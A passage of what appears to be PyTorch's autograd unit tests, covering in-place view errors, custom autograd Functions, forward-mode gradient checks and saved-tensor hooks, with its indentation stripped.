ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertEqual(non_inplace_grad, inplace_grad)
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks that multiples views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks custom autograd.Function that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
class BadBw2(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
@staticmethod
def backward(ctx, foo):
return foo
@staticmethod
def vjp(ctx, foo):
return foo
class BadJvp(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement either the backward"):
BadBw.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "Implementing both 'backward' and 'vjp'"):
BadBw2.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "must implement the jvp function"):
with fwAD.dual_level():
d = fwAD.make_dual(inp, torch.rand_like(inp))
res = BadJvp.apply(d)
def test_custom_function_forward_mode_view_checks(self):
flag_to_error = {
"ok": None,
"not_a_view": "jvp is not returning a view",
"not_a_view_of_inp": "jvp is not returning a view of the given",
"not_a_view_of_inp_base": "jvp is not returning a view of the same base",
}
class ViewFn(Function):
@staticmethod
def forward(ctx, foo, flag):
ctx.flag = flag
ctx.size = foo.size()
return foo.narrow(0, 0, 2)
@staticmethod
def vjp(ctx, gO):
gI = gO.new_zeros(ctx.size)
gI.narrow(0, 0, 2).copy_(gO)
return gI, None
@staticmethod
def jvp(ctx, gI, _):
res = gI.narrow(0, 0, 2)
if ctx.flag != "ok":
# Break the view in the gradients!
res = res.clone()
if ctx.flag in ["not_a_view_of_inp", "not_a_view_of_inp_base"]:
# Result should be a view, just of the wrong thing
res = res.view_as(res)
return res
inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
for flag, msg in flag_to_error.items():
def test_fn(inp):
if flag == "not_a_view_of_inp_base":
inp = inp.view_as(inp)
return ViewFn.apply(inp, flag)
if msg is None:
gradcheck(test_fn, inp, check_forward_ad=True)
else:
with self.assertRaisesRegex(RuntimeError, msg):
gradcheck(test_fn, inp, check_forward_ad=True)
def test_custom_function_forward_mode_inplace_checks(self):
class InplaceFn(Function):
@staticmethod
def forward(ctx, foo, flag):
ctx.mark_dirty(foo)
ctx.flag = flag
foo.mul_(2)
return foo
@staticmethod
def vjp(ctx, gO):
return 2 * gO, None
@staticmethod
def jvp(ctx, gI, _):
if ctx.flag:
# Don't do the change inplace
return 2 * gI
else:
gI.mul_(2)
return gI
inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
def test_fn(inp, flag):
inp = inp.clone()
return InplaceFn.apply(inp, flag)
gradcheck(test_fn, (inp, False), check_forward_ad=True)
with self.assertRaisesRegex(RuntimeError, "inplace custom Function is not modifying the forward mode gradients inplace"):
gradcheck(test_fn, (inp, True), check_forward_ad=True)
def test_custom_function_forward_mode_wrong_formula(self):
class UserFn(Function):
@staticmethod
def forward(ctx, foo, should_fail):
ctx.should_fail = should_fail
return foo * 2
@staticmethod
def vjp(ctx, gO):
return 2 * gO, None
@staticmethod
def jvp(ctx, gI, _):
if ctx.should_fail:
# Wrong gradient formula
return 3 * gI
else:
return 2 * gI
inp = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(UserFn.apply, (inp, False), check_forward_ad=True)
with self.assertRaisesRegex(RuntimeError, "Jacobian computed with forward mode mismatch for output 0"):
gradcheck(UserFn.apply, (inp, True), check_forward_ad=True)
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def test_saved_variable_packing_unpacking_saved_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
def test(get_input, is_leaf):
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x / 2)
self.assertEqual(a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(2 * a, a.grad)
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x)
self.assertEqual(2 * a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(3 * a, a.grad)
# double backward
a = get_input()
grad_fn = a.grad_fn
y = a ** 3
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
g.sum().backward()
else:
g.sum().backward()
self.assertEqual(6 * a, a.grad)
a = get_input()
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: 1)
with self.assertRaisesRegex(TypeError, "Output of saved tensor unpack_hook expected to be a Tensor"):
print(y.grad_fn._saved_self)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: x, lambda x: x)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: (x, b), lambda x: x)
def inplace_double(x):
x *= 2
return x
a = get_input()
t = a * a
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
t.grad_fn._raw_saved_self.register_hooks(inplace_double, lambda x: x / 2)
# leaf
test(lambda: torch.randn(5, requires_grad=True), True)
# not leaf, not output
test(lambda: (1 + torch.randn(5, requires_grad=True)), False)
def test_saved_variable_packing_unpacking_did_not_save_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
y.grad_fn._raw_saved_result.register_hooks(lambda x: x, lambda x: x)
self.assertEqual(y, y.grad_fn._saved_result)
self.assertIs(y.grad_fn, y.grad_fn._saved_result.grad_fn)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_saved_variable_packing_unpacking_saved_original_with_default_hooks(self):
# Tests that default hooks are properly registered, used and reset
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
# See also:
# - test_saved_variable_packing_unpacking_saved_original_with_hooks
def pack(x):
warnings.warn("pack")
return x
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
a = torch.ones(5, requires_grad=True)
warnings.simplefilter('always')
with warnings.catch_warnings(record=True) as w:
y = a * a
# should raise two warnings from a being saved twice
self.assertEqual(len(w), 2)
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x / 2):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(2 * a, y.grad_fn._saved_self)
self.assertEqual(2 * a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(4 * a, a.grad)
# Exited hooks correctly
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_saved_variable_packing_unpacking_did_not_save_original_with_default_hooks(self):
# See also test_saved_variable_packing_unpacking_did_not_save_original_with_hooks
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
self.assertEqual(y, y.grad_fn._saved_result)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_setting_default_saved_variable_hooks_twice_should_fail(self):
with self.assertRaisesRegex(RuntimeError, "Setting default hooks but they have already been set. "):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
pass
def test_pack_hook_with_inplace_modification_should_fail(self):
a = torch.randn(5, requires_grad=True)
def inc(x):
x += 1
return x
with torch.autograd.graph.saved_tensors_hooks(inc, lambda x: x):
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y = torch.exp(a)
y = torch.exp(a)
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y.grad_fn._raw_saved_result.register_hooks(inc, lambda x: x)
def test_saving_variable_to_disk(self):
with tempfile.TemporaryDirectory() as tmp_dir:
def pack(x):
name = os.path.join(tmp_dir, str(uuid.uuid4()))
torch.save(x, name)
return name
def unpack(name):
return torch.load(name)
with torch.autograd.graph.saved_tensors_hooks(pack, unpack):
a = torch.ones(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_default_saved_variable_hooks_double_backward(self):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
self.assertEqual(6 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 2 because only a is saved once
self.assertEqual(6 * 2 * a, a.grad)
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 4 because pow_backward is grad * (exp * self.pow(exp - 1))
# so grad is saved and self (i.e. a) is saved
self.assertEqual(6 * 4 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# combining the two above blocks: 2 * 4 = 8
# note that in that sense, a is saved twice
self.assertEqual(6 * 8 * a, a.grad)
def test_graph_save_on_cpu(self):
def test(get_input, cuda, pin_memory):
with torch.autograd.graph.save_on_cpu(pin_memory):
a = get_input()
if cuda:
a.cuda()
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
self.assertEqual(a.dtype, y.grad_fn._saved_self.dtype)
self.assertEqual(a.layout, y.grad_fn._saved_self.layout)
if y.is_sparse:
y = y.to_dense()
y.sum().backward()
self.assertEqual(2 * a, a.grad)
for cuda in [False] + ([True] if torch.cuda.is_available() else []):
for pin_memory in [True, False]:
# FloatTensor
test(lambda: torch.randn(5, requires_grad=True), cuda, pin_memory)
# DoubleTensor
test(lambda: torch.randn(5, requires_grad=True, dtype=torch.double), cuda, pin_memory)
# Sparse tensor
x = torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.]), requires_grad=True)
test(lambda: x, cuda, pin_memory)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_graph_save_on_cpu_cuda(self):
def f(x):
a = x + 1
return a * a
# with grad
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_grad = torch.cuda.memory_allocated()
del a
del y
# without grad
a = torch.ones(1, requires_grad=True, device="cuda")
with torch.no_grad():
y = f(a)
memory_without_grad = torch.cuda.memory_allocated()
self.assertGreater(memory_with_grad, memory_without_grad)
del a
del y
# with hooks
with torch.autograd.graph.save_on_cpu():
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_hooks = torch.cuda.memory_allocated()
self.assertEqual(memory_with_hooks, memory_without_grad)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
